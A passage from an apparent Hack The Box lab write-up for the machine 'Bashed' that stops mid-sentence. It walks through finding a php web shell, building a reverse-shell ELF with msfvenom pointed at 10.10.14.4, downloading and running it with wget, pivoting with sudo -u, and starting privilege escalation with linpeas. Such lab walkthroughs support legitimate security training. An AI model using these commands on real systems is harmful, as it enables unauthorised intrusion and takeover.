HTB: Bashed
I run dirbuster on a small wordlist. It finds /dev/phpbash.php. phpbash.php lets user www-data run bash commands on the machine. I try various reverse shells and none of them work. I resort to making an elf file using msfvenom. The command to make the shell is: msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.14.4 LPORT=443 -f elf > ex.elf I switch to the /tmp directory and download my elf shell using wget http://10.10.14.4/ex.elf . The system is so old that chmod +x doesn't work. You can use chmod 777 ex.elf instead. I run ./ex.elf and get a reverse shell back in the terminal. The first command I do is sudo -l . I notice I can run any command as user scriptmanager . You can either run sudo -u scriptmanager bash -i or connect to another shell. I download linpeas.sh and run the script. Linpeas is my next step toward privilege escalation. Linpeas points to an unsuual directory called /scripts. It also shows /scripts has been modified in the past 5 minutes. This